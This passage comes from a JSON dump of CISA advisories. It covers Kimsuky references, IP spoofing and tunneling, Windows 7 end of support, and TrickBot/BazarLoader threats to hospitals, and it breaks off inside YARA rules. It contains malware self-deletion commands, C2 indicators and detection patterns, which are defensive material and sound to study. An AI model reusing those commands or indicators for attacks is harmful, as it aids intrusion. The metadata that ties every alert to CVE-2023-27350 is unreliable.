commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Netscout: Stolen Pencil Campaign Targets Academia ](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[2] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[3] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[4] Netscout: Stolen Pencil Campaign Targets Academia ](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[5] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[6] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities](<https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities>)\n\n[[7] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[8] CrowdStrike: 2020 Global Threat Report](<https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf>)\n\n[[9] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure](<https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/>)\n\n[[10] PwC: Tracking \u2018Kimsuky\u2019, the North Korea-based cyber espionage group: Part 2](<https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html>)\n\n[[11] CrowdStrike: 2020 Global Threat Report](<https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf>)\n\n[[12] Netscout: Stolen Pencil Campaign Targets Academia ](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[13] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n\">[14] Private Sector Partner\n\n[[15] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[16] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure](<https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/>)\n\n[[17] cyberscoop: North Korea could accelerate commercial espionage to meet Kim\u2019s economic deadline ](<https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/>)\n\n[[18] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[19] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[20] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[21] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)\n\n[[22] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)\n\n[[23] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[24] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[25] Palo Alto Networks Unit 42: BabyShark Malware Part Two \u2013 Attacks Continue Using KimJongRAT and PCRat ](<https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/>)\n\n[[26] McAfee: What is mshta, how can it be used and how to protect against it](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>)\n\n[[27] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)\n\n[[28] Netscout: Stolen Pencil Campaign Targets Academia](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[29] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[30] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)\n\n[[31] Netscout: Stolen Pencil Campaign Targets Academia ](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[32] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n\">[33] Private Sector Partner\n\n\">[34] Private Sector Partner\n\n[[35] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[36] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs](<https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/>)\n\n[[37] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs](<https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/>)\n\n[[38] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[39] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[40] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[41] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[42] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[43] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[44] McAfee: What is mshta, how can it be used and how to protect against it](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>)\n\n[[45] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities](<https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities>)\n\n[[46] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[47] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[48] Detecting credential theft through memory access modelling with Microsoft Defender ATP](<https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/>)\n\n[[49] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[50] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims](<https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/>)\n\n[[51] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims](<https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/>)\n\n[[52] Netscout: Stolen Pencil Campaign Targets Academia ](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[53] Netscout: Stolen Pencil Campaign Targets Academia ](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n\">[54] Private Sector Partner\n\n[[55] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT? ](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[56] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT? ](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n\">[57] Private Sector Partner\n\n[[58] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT? ](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n\">[59] Private Sector Partner\n\n[[60] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT? ](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n### Revisions\n\nOctober 27, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-27T12:00:00", "type": "ics", "title": "North Korean Advanced Persistent Threat Focus: Kimsuky", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2020-10-27T12:00:00", "id": "AA20-301A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-301a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:32:05", "description": "### Summary\n\n_This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u2122) and Pre-ATT&CK frameworks. See the MITRE [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) and [Pre-ATT&CK](<https://attack.mitre.org/versions/v7/techniques/pre/>) frameworks for referenced threat actor techniques._\n\nAttributing malicious cyber activity that uses network tunneling and spoofing techniques to a specific threat actor is difficult. Attribution requires analysis of multiple variables, including location. Because threat actors can use these techniques to obfuscate their location, it is not possible to identify the true physical location of malicious activity based solely on the geolocation of Internet Protocol (IP). This Alert discusses how threat actors use these obfuscation techniques to mislead incident responders.\n\n### Technical Details\n\n## Geolocation\n\nThe geolocation of an IP address is often obtained with publicly available information ([WHOIS](<https://whois.icann.org/en/about-whois>) registration) or proprietary information. The level of geographic precision varies widely across sources; some provide country and locality details, while others provide neighborhood-level detail. Additionally, the accuracy of this information varies by source.\n\nHowever, even if the geolocation of an IP address is accurate, the threat actor may not be physically located near it; instead, they may be hiding their true location through the use of spoofing and network tunnels.\n\n## Spoofing\n\nA threat actor can spoof packets with an arbitrary source IP address, which in turn geolocates to a specific country (see figure 1). The actor's physical location may be elsewhere. The actor then initiates their malicious activity. Network defenders see packets originating from a source IP address that did not generate the traffic. This technique is most common with connectionless activities, such as distributed _Endpoint Denial of Service_ [[T1499]](<https://attack.mitre.org/versions/v7/techniques/T1499/>) and _Network Denial of Service_ [[T1498]](<https://attack.mitre.org/versions/v7/techniques/T1498/>)\u2014 including DNS amplification\u2014attacks.\n\n\n\nFigure 1: IP spoofing\n\n## Encapsulating Network Tunnels\n\nA network tunnel encapsulates network traffic between two points (see figure 2). Often network tunnels are used for legitimate purposes, such as secure remote administration or creating virtual private networks (VPNs). However, a malicious cyber actor can use this technique to mask their true source IP address and, therefore, their physical location. The threat actor accomplishes masking by using virtual private servers (VPSs), which can be purchased through commercial providers. The threat actor will initiate a remote network tunnel from their computer to the VPS and then use the VPS to initiate malicious activity. Network defenders see the IP address, as well as geolocation information of the VPS. Attempts to identify the cyber actor\u2019s physical location by using the geolocation of the VPS will be inaccurate. Network tunneling is common with malicious _Connection Proxy _[[T1090]](<https://attack.mitre.org/versions/v7/techniques/T1090/>) activities.\n\n\n\nFigure 2: Network tunnel encapsulation\n\nThe ease with which IP addresses can be spoofed and the possibility that activity could be tunneled through a network to intentionally mask the true source prevents any attempt to identify the physical location of the activity based solely on the geolocation of the IP address.\n\n### Mitigations\n\nIn addition to being knowledgeable about threat actor obfuscation techniques, CISA encourages incident responders to review the following best practices to strengthen the security posture of their systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.\n\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>).\n * Ensure systems have the latest security updates. See [Understanding Patches and Software Updates](<https://www.us-cert.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n * Restrict users' permissions to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations that is configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\n\n## Additional Information\n\n[Sign up](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) to receive CISA\u2019s alerts on security topics and threats.\n\nSign up for CISA\u2019s free vulnerability scanning and testing services to help organizations secure internet-facing systems from weak configuration and known vulnerabilities. Email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>) to sign up. See <https://www.cisa.gov/cyber-resource-hub> for more information about vulnerability scanning and other CISA cybersecurity assessment services.\n\n## Acknowledgements\n\nPalo Alto Networks and IBM contributed to this Alert.\n\n### References\n\n[Cloudflare Blog: The real cause of large DDoS - IP Spoofing](<https://blog.cloudflare.com/the-root-cause-of-large-ddos-ip-spoofing/>)\n\n[Cisco Configuration Guide: Implementing Tunnels](<https://www.cisco.com/c/en/us/td/docs/ios/12_4/interface/configuration/guide/inb_tun.html>)\n\n### Revisions\n\nJuly 16, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Malicious Cyber Actor Use of Network Tunneling and Spoofing to Obfuscate Geolocation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2020-10-24T12:00:00", "id": "AA20-198A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-198a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:35:08", "description": "### Summary\n\n_**Note**: This alert does not apply to federally certified voting systems running Windows 7. Microsoft will continue to provide free security updates to those systems through the 2020 election. See Microsoft\u2019s article, [Extending free Windows 7 security updates to voting systems](<https://blogs.microsoft.com/on-the-issues/2019/09/20/extending-free-windows-7-security-updates-to-voting-systems/>), for more information._\n\nOn January 14, 2020, Microsoft will end extended support for their Windows 7 and Windows Server 2008 R2 operating systems.[[1]](<https://www.microsoft.com/en-us/windows/windows-7-end-of-life-support-information>) After this date, these products will no longer receive free technical support, or software and security updates.\n\nOrganizations that have regulatory obligations may find that they are unable to satisfy compliance requirements while running Windows 7 and Windows Server 2008 R2.\n\n### Technical Details\n\nAll software products have a lifecycle. \u201cEnd of support\u201d refers to the date when the software vendor will no longer provide automatic fixes, updates, or online technical assistance. [[2]](<https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet>)\n\nFor more information on end of support for Microsoft products see the [Microsoft End of Support FAQ](<https://www.microsoft.com/en-us/windows/windows-7-end-of-life-support-information>).\n\nSystems running Windows 7 and Windows Server 2008 R2 will continue to work at their current capacity even after support ends on January 14, 2020. However, using unsupported software may increase the likelihood of malware and other security threats. Mission and business functions supported by systems running Windows 7 and Windows Server 2008 R2 could experience negative consequences resulting from unpatched vulnerabilities and software bugs. These negative consequences could include the loss of confidentiality, integrity, and availability of data, system resources, and business assets.\n\n### Mitigations\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and organizations to:\n\n * Upgrade to a newer operating system.\n * Identify affected devices to determine breadth of the problem and assess risk of not upgrading. \n * Establish and execute a plan to systematically migrate to currently supported operating systems or employ a cloud-based service. \n * Contact the operating system vendor to explore opportunities for fee-for-service maintenance, if unable to upgrade. \n\n### References\n\n[[1] Microsoft End of Support FAQ](<https://www.microsoft.com/en-us/windows/windows-7-end-of-life-support-information>)\n\n[[2] Microsoft Windows Lifecyle Fact Sheet](<https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet>)\n\n[[3] Microsoft Windows Upgrade and Migration Considerations](<https://docs.microsoft.com/en-us/windows/deployment/upgrade/windows-upgrade-and-migration-considerations>)\n\n[[4] ComputerWorld: Leaving Windows 7? Here are Some non-Windows Options](<https://www.computerworld.com/article/3431616/leaving-windows-7-here-are-some-non-windows-options.html>)\n\n[[5] CISA Analysis Report AR19-133A: Microsoft Office 365 Security Observations](<https://www.us-cert.gov/ncas/analysis-reports/AR19-133A>)\n\n### Revisions\n\nOctober 17, 2019: Initial version|October 18, 2019: Added note\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-18T12:00:00", "type": "ics", "title": "Microsoft Ending Support for Windows 7 and Windows Server 2008 R2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2019-10-18T12:00:00", "id": "AA19-290A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-290a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:30:50", "description": "### Summary\n\n**_This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection._**\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) version 7 framework. See the [ATT&CK for Enterprise version 7](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health (HPH) Sector to infect systems with ransomware, notably Ryuk and Conti, for financial gain.\n\nCISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.\n\nClick here for a PDF version of this report.\n\n#### Key Findings\n\n * CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.\n * These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.\n\n### Technical Details\n\n### Threat Details\n\nThe cybercriminal enterprise behind TrickBot, which is likely also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders\u2014like TrickBot and BazarLoader (or BazarBackdoor)\u2014as part of their malicious cyber campaigns. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim\u2019s machine.\n\n#### TrickBot\n\nWhat began as a banking trojan and descendant of Dyre malware, TrickBot now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.\n\nIn early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims\u2014such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created `anchor_dns`, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.\n\n`anchor_dns` is a backdoor that allows victim machines to communicate with C2 servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. `anchor_dns` uses a single-byte `XOR` cipher to encrypt its communications, which have been observed using key `0xB9`. Once decrypted, the string `anchor_dns` can be found in the DNS request traffic.\n\n#### TrickBot Indicators of Compromise\n\nAfter successful execution of the malware, TrickBot copies itself as an executable file with a 12-character randomly generated file name (e.g. `mfjdieks.exe`) and places this file in one of the following directories.\n\n * C:\\Windows\\\n * C:\\Windows\\SysWOW64\\\n * C:\\Users\\\\[Username]\\AppData\\Roaming\\\n\nOnce the executable is running and successful in establishing communication with C2s, the executable places appropriate modules downloaded from C2s for the infected processor architecture type (32 or 64 bit instruction set), to the infected host\u2019s `%APPDATA%` or `%PROGRAMDATA%` directory, such as `%AppData\\Roaming\\winapp`. Some commonly named plugins that are created in a Modules subdirectory are (the detected architecture is appended to the module filename, e.g., `importDll32` or `importDll64`):\n\n * `Systeminfo`\n * `importDll`\n * `outlookDll`\n * `injectDll `with a directory (ex. `injectDLL64_configs`) containing configuration files: \n * `dinj`\n * `sinj`\n * `dpost`\n * `mailsearcher` with a directory (ex. `mailsearcher64_configs`) containing configuration file: \n * `mailconf`\n * `networkDll` with a directory (ex. networkDll64_configs) containing configuration file: \n * `dpost`\n * `wormDll`\n * `tabDll`\n * `shareDll`\n\nFilename `client_id` or `data `or `FAQ `with the assigned bot ID of the compromised system is created in the malware directory. Filename `group_tag` or `Readme.md` containing the TrickBot campaign IDs is created in the malware directory.\n\nThe malware may also drop a file named `anchorDiag.txt` in one of the directories listed above.\n\nPart of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded `GUID`. The `GUID `is composed of `/GroupID/ClientID/` with the following naming convention:\n\n`/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/`.\n\nThe malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.\n\n`[random_folder_name_in_%APPDATA%_excluding_Microsoft]`\n\n`autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876)`.\n\nAfter successful execution, `anchor_dns` further deploys malicious batch scripts (`.bat`) using PowerShell commands.\n\nThe malware deploys self-deletion techniques by executing the following commands.\n\n * `cmd.exe /c timeout 3 && del C:\\Users\\[username]\\[malware_sample]`\n * `cmd.exe /C PowerShell \\\"Start-Sleep 3; Remove-Item C:\\Users\\[username]\\[malware_sample_location]\\\"`\n\nThe following domains found in outbound DNS records are associated with `anchor_dns`.\n\n * `kostunivo[.]com`\n * `chishir[.]com`\n * `mangoclone[.]com`\n * `onixcellent[.]com`\n\nThis malware used the following legitimate domains to test internet connectivity.\n\n * `ipecho[.]net`\n * `api[.]ipify[.]org`\n * `checkip[.]amazonaws[.]com`\n * `ip[.]anysrc[.]net`\n * `wtfismyip[.]com`\n * `ipinfo[.]io`\n * `icanhazip[.]com`\n * `myexternalip[.]com`\n * `ident[.]me`\n\nCurrently, there is an open-source tracker for TrickBot C2 servers located at <https://feodotracker.abuse.ch/browse/trickbot/>.\n\nThe `anchor_dns` malware historically used the following C2 servers.\n\n * `23[.]95[.]97[.]59`\n * `51[.]254[.]25[.]115`\n * `193[.]183[.]98[.]66`\n * `91[.]217[.]137[.]37`\n * `87[.]98[.]175[.]85`\n\n#### TrickBot YARA Rules\n\nrule anchor_dns_strings_filenames { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off strings or filenames used in malware\" \nauthor = \"NCSC\" \nhash1 = \"fc0efd612ad528795472e99cae5944b68b8e26dc\" \nhash2 = \"794eb3a9ce8b7e5092bb1b93341a54097f5b78a9\" \nhash3 = \"9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2\" \nhash4 = \"24d4bbc982a6a561f0426a683b9617de1a96a74a\" \nstrings: \n$ = \",Control_RunDLL \\x00\" \n$ = \":$GUID\" ascii wide \n$ = \":$DATA\" ascii wide \n$ = \"/1001/\" \n$ = /(\\x00|\\xCC)qwertyuiopasdfghjklzxcvbnm(\\x00|\\xCC)/ \n$ = /(\\x00|\\xCC)QWERTYUIOPASDFGHJKLZXCVBNM(\\x00|\\xCC)/ \n$ = \"start program with cmdline \\\"%s\\\"\" \n$ = \"Global\\\\\\fde345tyhoVGYHUJKIOuy\" \n$ = \"ChardWorker::thExecute: error registry me\" \n$ = \"get command: incode %s, cmdid \\\"%s\\\", cmd \\\"%s\\\"\" \n$ = \"anchorDNS\" \n$ = \"Anchor_x86\" \n$ = \"Anchor_x64\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them \n}\n\nrule anchor_dns_icmp_transport { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off ICMP transport strings\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nstrings: \n$ = \"reset_connection <\\- %s\" \n$ = \"server_ok <\\- %s (packets on server %s)\" \n$ = \"erase successfully transmitted packet (count: %d)\" \n$ = \"Packet sended with crc %s -> %s\" \n$ = \"send data confimation to server(%s)\" \n$ = \"data recived from <\\- %s\" \n$ = \"Rearmost packed recived (id: %s)\" \n$ = \"send poll to server -> : %s\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them \n}\n\nrule anchor_dns_config_dexor { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)\" \nauthor = \"NCSC\" \nhash1 = \"d0278ec015e10ada000915a1943ddbb3a0b6b3db\" \nhash2 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nstrings: \n$x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? C3} \n$x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_installer { \nmeta: \ndescription = \"Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code\" \nauthor = \"NCSC\" \nhash1 = \"fa98074dc18ad7e2d357b5d168c00a91256d87d1\" \nhash2 = \"78f0737d2b1e605aad62af252b246ef390521f02\" \nstrings: \n$pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$ \n$pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll \n$deob_x86 = {8B C8 89 4D F8 83 F9 